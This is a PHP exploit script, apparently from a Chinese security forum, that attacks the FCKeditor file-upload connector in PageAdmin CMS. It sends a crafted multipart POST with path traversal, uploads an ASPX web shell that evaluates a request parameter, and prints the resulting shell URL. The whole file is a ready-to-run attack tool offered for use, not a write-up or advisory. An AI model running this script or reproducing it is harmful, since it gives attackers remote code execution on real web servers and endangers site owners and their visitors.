#!/usr/bin/php
<?php
error_reporting(0);
print_r('
+---------------------------------------------------------------------------+
PageAdmin cms Fckeditor Upload Vul Exploit
by:admin@heixiaozi.com 
cfking@90sec.org   
welcome to www.90sec.org www.webvul.com    
+---------------------------------------------------------------------------+
'
);

if(count($argv) < 2 ){
print_r('
Usage: php '.$argv[0].' url Path
Example:
php '.$argv[0].' www.site.com path
');
   exit;
}
$url=$argv[1];
$path=$argv[2];
$token=getshell($url,$path);
if($token==null){
echo "[-] Exploit Failed \n";
}else{
echo "[*] Exploit Success \n";
echo "[*] Shell:http://$url/upload/$token\n";
}

function Getshell($url,$path){
$host=$url;
$port="80";
$content ="-----------------------------1398531028480\r\nContent-Disposition: form-data; name=\"NewFile\"; filename=\"cfking.aspx\"\r\nContent-Type: application/octet-stream\r\n\r\n<% @Page Language=\"Jscript\"%><%eval(Request.Item[\"90sec.org\"],\"unsafe\");%>\r\n-----------------------------1398531028480--\r\n";
$data = "POST $path//master/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2F..%2F..%2F..%2F..%2Fupload HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Keep-Alive: 300\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: multipart/form-data; boundary=---------------------------1398531028480\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host \n";
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp .=fgets($ock, 1024);
}
preg_match("/(0,'(.*?)')/", $exp, $arr);
return $arr[2];
}

?>